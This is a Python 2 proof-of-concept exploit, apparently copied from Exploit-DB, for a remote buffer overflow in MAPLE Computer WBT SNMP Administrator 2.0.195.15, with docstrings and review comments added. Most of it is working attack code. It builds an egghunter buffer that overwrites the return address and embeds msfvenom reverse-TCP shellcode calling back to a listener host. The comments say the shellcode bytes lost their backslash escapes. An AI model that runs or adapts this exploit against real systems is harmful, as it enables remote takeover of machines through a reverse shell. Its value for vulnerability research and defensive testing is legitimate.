


MAPLE Computer WBT SNMP Administrator 2.0.195.15



# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)
# Author: sasaga92
# Discovery Date: 2019-07-18
# Vendor Homepage: www.computerlab.com
# Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager
# Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
# Tested on OS: Windows XP SP2 x86
# CVE: N/A
# [+] Credits: John Page (aka hyp3rlinx)  


#!/usr/bin/python

import sys
import socket
import random
import string
import struct



def pattern_create(_type, _length):
  """Return a filler string of ``_length`` characters.

  ``_type`` is a space-separated spec whose first word picks the mode:
    * ``"trash X"`` -- the token ``X`` repeated ``_length`` times;
    * ``"random"``  -- ``_length`` letters drawn from ``string.lowercase``
      with the non-cryptographic ``random`` module (Python 2 only attribute);
    * ``"pattern"`` -- the cyclic ``Aa0Aa1Aa2...`` sequence, which is unique
      over any 3-byte window and is used to read an offset back out of a
      crash register.
  Any other first word returns the literal string ``"Not Found"``.

  Caveats: ``"trash"`` with no second word raises IndexError, and the
  ``pattern`` loop stops only when the length matches exactly, so a
  negative ``_length`` never terminates.
  """
  words = _type.split(" ")
  mode = words[0]

  if mode == "trash":
    return words[1] * _length

  if mode == "random":
    return ''.join(random.choice(string.lowercase) for _ in range(_length))

  if mode == "pattern":
    upper, lower, digit = 'A', 'a', '0'
    out = []
    while len(out) != _length:
      out.append((upper, lower, digit)[len(out) % 3])
      # After every full triplet advance the digit, carrying into the
      # lowercase and then the uppercase position.
      if len(out) % 3 == 0:
        digit = chr(ord(digit) + 1)
        if digit > '9':
          digit = '0'
          lower = chr(ord(lower) + 1)
          if lower > 'z':
            lower = 'a'
            upper = chr(ord(upper) + 1)
            if upper > 'Z':
              upper = 'A'
    return ''.join(out)

  return "Not Found"

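def pwned(_host, _port, _payload):
  """Send ``_payload`` to ``_host``:``_port`` over TCP and print the reply.

  Parameters:
    _host    -- target address string.
    _port    -- TCP port (int).
    _payload -- request body. The trailer from ``"{0}rnrn"`` is appended
                before sending, so the byte count printed last includes it.

  The socket is closed on every path: the original referenced
  ``s.shutdown`` and ``s.close`` without calling them, so the descriptor
  was never released. Socket errors still propagate to the caller.
  Python 2 code (``str`` is sent as bytes); console messages are the
  author's original Spanish text.
  """
  print("[*] Conectandose a {0}:{1}...".format(_host, _port))
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  try:
    s.connect((_host, _port))
    print("[*] Conectado, Enviando payload {0} bytes...".format(len(_payload)))
    _payload = "{0}rnrn".format(_payload)
    s.send(_payload)
    _data = s.recv(1024)
  finally:
    # close() is a call here; the original's bare `s.shutdown` / `s.close`
    # were attribute lookups with no effect.
    s.close()
  print("{0} {1}".format('Recibido:', repr(_data)))
  print("[+] Payload de {0} bytes Enviado, Satisfactoriamente su payload ejecutado.".format(len(_payload)))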


def main():
  """Assemble the overflow buffer and hand it to pwned().

  Buffer layout, in the order built below:
    filler 'A' * (_padding - len(_tag) - len(_shellcode))
    _tag         8-byte egg marker
    _shellcode   msfvenom reverse_tcp payload, x86/alpha_mixed encoded
    _egghunter   short stub that locates the egg and runs what follows it
    filler 'B'   up to _offset_eip
    _eip         4-byte return address (author comment: call ebx 0x5AD778C3)
  Target host/port and all offsets are hard-coded lab values from the
  author; nothing here is derived at run time.

  NOTE(review): the byte strings in this copy (_eip, _shellcode,
  _egghunter, and the "rnrn" trailer in pwned) appear to have lost their
  backslashes in transit -- "xc3x78xd7x5a" is the little-endian form of
  the 0x5AD778C3 named in the comment, minus the escapes. They are left
  byte-identical here; do not treat these literal ASCII runs as on-the-wire
  indicators.
  """

  # Lab target (author's values); the msfvenom line below names the
  # listener side as 192.168.0.11:443.
  _host = "192.168.0.12"
  _port = 987
  # Offsets per the author's crash analysis (not re-derived on this page):
  # _offset_eip is where the saved return address lands, _padding is where
  # the egg+shellcode block is placed before it.
  _offset_eip = 642200
  _padding = 642144
  _eip = "xc3x78xd7x5a" #call ebx 0x5AD778C3
  # Egg searched for by the egghunter; the hunter bytes embed 0x74303077
  # ("w00t"), i.e. presumably it scans for the 4-byte tag twice in a row
  # (standard egghunter behaviour -- not verified here).
  _tag = "w00tw00t"

  #msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.11 LPORT=443 -e x86/alpha_mixed -f c
  # Alphanumeric-encoded shellcode (x86/alpha_mixed); decoder stub first.
  _shellcode = ("x89xe6xdaxd8xd9x76xf4x5dx55x59x49x49x49x49x49"
    "x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
    "x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
    "x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
    "x39x6cx39x78x6cx42x53x30x73x30x35x50x35x30x4d"
    "x59x78x65x30x31x4bx70x51x74x6ex6bx36x30x54x70"
    "x4ex6bx33x62x74x4cx4ex6bx30x52x52x34x4cx4bx44"
    "x32x45x78x46x6fx6cx77x33x7ax31x36x64x71x6bx4f"
    "x6ex4cx65x6cx30x61x73x4cx74x42x46x4cx67x50x59"
    "x51x68x4fx36x6dx76x61x7ax67x59x72x4cx32x51x42"
    "x32x77x4ex6bx33x62x36x70x6ex6bx52x6ax47x4cx4e"
    "x6bx42x6cx76x71x61x68x5ax43x52x68x33x31x58x51"
    "x63x61x6cx4bx52x79x45x70x57x71x79x43x4cx4bx53"
    "x79x62x38x4bx53x44x7ax37x39x4cx4bx66x54x4cx4b"
    "x47x71x38x56x76x51x49x6fx6ex4cx7ax61x78x4fx34"
    "x4dx76x61x5ax67x56x58x79x70x33x45x49x66x66x63"
    "x51x6dx69x68x65x6bx73x4dx66x44x64x35x5ax44x50"
    "x58x4ex6bx30x58x37x54x47x71x59x43x63x56x6ex6b"
    "x44x4cx50x4bx4cx4bx46x38x75x4cx43x31x69x43x4e"
    "x6bx44x44x6cx4bx45x51x38x50x4dx59x57x34x36x44"
    "x51x34x51x4bx53x6bx33x51x71x49x53x6ax76x31x6b"
    "x4fx69x70x61x4fx63x6fx53x6ax6ex6bx62x32x58x6b"
    "x6ex6dx61x4dx75x38x55x63x37x42x53x30x77x70x52"
    "x48x54x37x74x33x57x42x71x4fx32x74x50x68x62x6c"
    "x51x67x36x46x56x67x6ex69x59x78x6bx4fx4ex30x6e"
    "x58x4ex70x73x31x55x50x53x30x56x49x48x44x53x64"
    "x66x30x45x38x76x49x6fx70x32x4bx33x30x79x6fx4e"
    "x35x43x5ax57x7ax31x78x6bx70x4fx58x75x50x76x6b"
    "x33x58x75x52x65x50x43x31x6dx6bx6cx49x48x66x72"
    "x70x76x30x76x30x66x30x43x70x46x30x61x50x72x70"
    "x32x48x6bx5ax56x6fx69x4fx4bx50x69x6fx48x55x7a"
    "x37x43x5ax56x70x31x46x36x37x43x58x6ex79x6ex45"
    "x42x54x51x71x4bx4fx39x45x4ex65x4bx70x43x44x46"
    "x6ax39x6fx70x4ex45x58x50x75x38x6cx49x78x33x57"
    "x35x50x35x50x73x30x32x4ax45x50x71x7ax64x44x31"
    "x46x50x57x42x48x64x42x78x59x4ax68x73x6fx49x6f"
    "x49x45x4dx53x48x78x73x30x71x6ex77x46x6ex6bx75"
    "x66x73x5ax57x30x73x58x67x70x34x50x47x70x47x70"
    "x46x36x70x6ax37x70x50x68x51x48x69x34x76x33x78"
    "x65x39x6fx79x45x5ax33x76x33x51x7ax55x50x66x36"
    "x71x43x52x77x31x78x56x62x78x59x6fx38x53x6fx49"
    "x6fx79x45x4ex63x58x78x45x50x71x6dx64x68x70x58"
    "x61x78x33x30x51x50x43x30x47x70x53x5ax53x30x70"
    "x50x51x78x64x4bx36x4fx44x4fx50x30x69x6fx58x55"
    "x31x47x31x78x54x35x52x4ex62x6dx35x31x49x6fx7a"
    "x75x31x4ex51x4ex4bx4fx64x4cx46x44x76x6fx6ex65"
    "x54x30x59x6fx79x6fx4bx4fx6bx59x4fx6bx69x6fx79"
    "x6fx39x6fx37x71x48x43x51x39x4fx36x74x35x6fx31"
    "x58x43x4fx4bx78x70x58x35x6ex42x43x66x70x6ax37"
    "x70x73x63x69x6fx59x45x41x41")

  # Egghunter stub; the bytes 77 30 30 74 are ASCII "w00t", matching _tag.
  _egghunter = ("x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x77x30x30x74x8bxfaxafx75xeaxafx75xe7xffxe7")
 
  # Build the buffer front to back; the second filler is sized from the
  # running length so _eip always lands at _offset_eip.
  _inject =  pattern_create("trash A", _padding-len(_tag)-len(_shellcode))
  _inject += _tag
  _inject += _shellcode
  _inject += _egghunter
  _inject +=  pattern_create("trash B", _offset_eip-len(_inject))
  _inject += _eip
  
  # Echo the complete buffer to stdout before it is sent.
  print(_inject)
  pwned(_host,_port,_inject)

# Script entry point; target, offsets and payload are hard-coded in main().
if __name__ == "__main__":
    main()
            





https://www.exploit-db.com/exploits/47137



